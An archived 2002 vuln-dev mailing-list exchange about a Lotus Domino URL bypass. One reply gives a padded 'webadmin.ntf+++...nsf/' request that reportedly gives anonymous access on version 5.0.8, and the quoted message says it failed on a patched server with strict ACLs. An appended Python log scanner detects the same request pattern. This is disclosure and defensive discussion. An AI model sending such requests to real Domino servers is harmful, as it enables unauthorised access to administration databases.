Vulnerability Development mailing list archives

Re: Antwort: Lotus Domino url bypass


From: "CT" <ct () arnet com ar>
Date: Mon, 4 Feb 2002 14:54:45 -0300

http://www.xxxx.com/webadmin.ntf++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++.nsf/
Gets in with Anonymous access; tested with exactly 219 buffer characters
on version 5.0.8. But on version 5.0.4 it doesn't work:

Domino web administrator is unable to run
The database "webadmin.nsf" needs to be signed with an ID file which
is granted "Run unrestricted Lotuscript/Java agents".

CyRaNo
www.heinekenteam.com
Carolyn Meinel fan´s club

----- Original Message -----
From: <j.mickerts () gmx net>
To: <gmaggiot () ciudad com ar>
Cc: <bugtraq () securityfocus com>; <gabi () postino8 int prima com ar>;
<vuln-dev () securityfocus com>
Sent: Monday, February 04, 2002 5:35 AM
Subject: Antwort: Lotus Domino url bypass


Hi,

this does not work for me. I tested it against Domino 5.0.8 on Windows
2000 SP2 with all actual patches. I get redirected to the login-page. How
are your ACLs on the template? Mine do not allow Anonymous or Default any
access. Maybe this corrects the issue. I also use SSL to connect, but this
should not interfere with the exploit. Maybe you should state version and
platform.

Kind regards,

Jens Mickerts
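
A defender-side check for the request shape discussed in this thread, added here as an example and not part of either message: it scans web server access-log lines for a `.ntf` template name followed by a run of `+` padding and a `.nsf` suffix. The Common Log Format layout, the `MIN_PAD` threshold and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: flag any padding run of at least MIN_PAD characters. The post
# reports 219, but a lower threshold also catches shorter variations.
MIN_PAD = 8
# ".ntf" + padding ('+' or space after percent-decoding) + ".nsf"
PADDED = re.compile(r"\.ntf(?P<pad>[+ ]{%d,})\.nsf" % MIN_PAD, re.IGNORECASE)
# Request and status fields of a Common Log Format line (assumed log layout).
REQUEST = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def find_padded_template_requests(lines):
    """Return one record per log line whose path matches the padded pattern."""
    hits = []
    for line in lines:
        req = REQUEST.search(line)
        if not req:
            continue
        # Decode %2B / %20 so encoded padding is caught as well.
        path = unquote(req.group("path"))
        match = PADDED.search(path)
        if match:
            hits.append({
                "client": line.split(" ", 1)[0],
                "pad_len": len(match.group("pad")),
                # The status shows whether the server answered with content
                # or with a redirect/denial, which is what the ACL decides.
                "status": int(req.group("status")),
            })
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
TS = "[04/Feb/2002:14:50:01 -0300]"
SAMPLE_LOG = [
    '192.0.2.10 - - %s "GET /webadmin.ntf%s.nsf/ HTTP/1.0" 200 5120' % (TS, "+" * 219),
    '192.0.2.11 - - %s "GET /webadmin.ntf%s.nsf/ HTTP/1.0" 302 0' % (TS, "%2B" * 40),
    '192.0.2.12 - - %s "GET /names.nsf/People?OpenView HTTP/1.0" 401 210' % TS,
    '192.0.2.13 - - %s "GET /help/readme+first.nsf/ HTTP/1.0" 200 900' % TS,
]

if __name__ == "__main__":
    for hit in find_padded_template_requests(SAMPLE_LOG):
        print(hit)
```

A hit answered with a 200 deserves a look at the ACLs on the template named in the request, since the reply above attributes the different results to Anonymous and Default access settings.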



